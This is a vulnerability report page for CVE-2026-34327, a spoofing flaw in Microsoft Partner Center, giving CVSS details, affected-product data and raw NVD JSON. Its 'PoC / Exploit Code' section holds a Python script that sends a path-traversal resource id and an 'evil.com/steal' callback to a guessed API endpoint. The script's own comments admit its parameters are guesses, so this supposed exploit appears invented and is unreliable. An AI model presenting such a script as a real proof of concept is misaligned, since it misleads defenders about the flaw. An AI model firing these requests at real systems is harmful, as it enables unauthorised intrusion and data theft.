Security Vulnerability Report
中文
CVE-2026-34327 CVSS 8.2 HIGH

CVE-2026-34327

Published: 2026-05-07 22:16:35
Last Modified: 2026-05-08 20:03:28

Description

Externally controlled reference to a resource in another sphere in Microsoft Partner Center allows an unauthorized attacker to perform spoofing over a network.

CVSS Details

CVSS Score
8.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:microsoft:partner_center:-:*:*:*:*:*:*:* - VULNERABLE
Microsoft Partner Center (具体受影响版本请参考官方安全通告)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Proof of Concept for CVE-2026-34327 # This script demonstrates the concept of manipulating a resource reference. # Usage: python poc.py <target_url> import requests import sys def exploit(target_url): # The vulnerable endpoint accepts a 'resource_id' or similar parameter # that is not properly validated against the trusted sphere. vulnerable_endpoint = f"{target_url}/api/v1/resource" # Malicious payload: An external reference to an attacker-controlled resource # This tricks the server into processing a resource from an untrusted sphere. payload = { "id": "../../../attacker-controlled/malicious.json", # Path traversal or external ref "callback": "http://evil.com/steal" } headers = { "User-Agent": "CVE-2026-34327-Scanner", "Content-Type": "application/json" } try: print(f"[*] Sending spoofing request to {target_url}...") response = requests.post(vulnerable_endpoint, json=payload, headers=headers, timeout=10) if response.status_code == 200: print("[+] Request successful! The server may have processed the external reference.") print(f"[+] Response: {response.text[:200]}") else: print(f"[-] Request failed with status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] An error occurred: {e}") if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python3 poc.py <https://target-url>") sys.exit(1) target = sys.argv[1] exploit(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-34327", "sourceIdentifier": "[email protected]", "published": "2026-05-07T22:16:34.540", "lastModified": "2026-05-08T20:03:28.287", "vulnStatus": "Analyzed", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["exclusively-hosted-service"]}], "descriptions": [{"lang": "en", "value": "Externally controlled reference to a resource in another sphere in Microsoft Partner Center allows an unauthorized attacker to perform spoofing over a network."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-610"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:partner_center:-:*:*:*:*:*:*:*", "matchCriteriaId": "A400A527-15CD-4F9D-A42D-A453ABE04769"}]}]}], "references": [{"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-34327", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}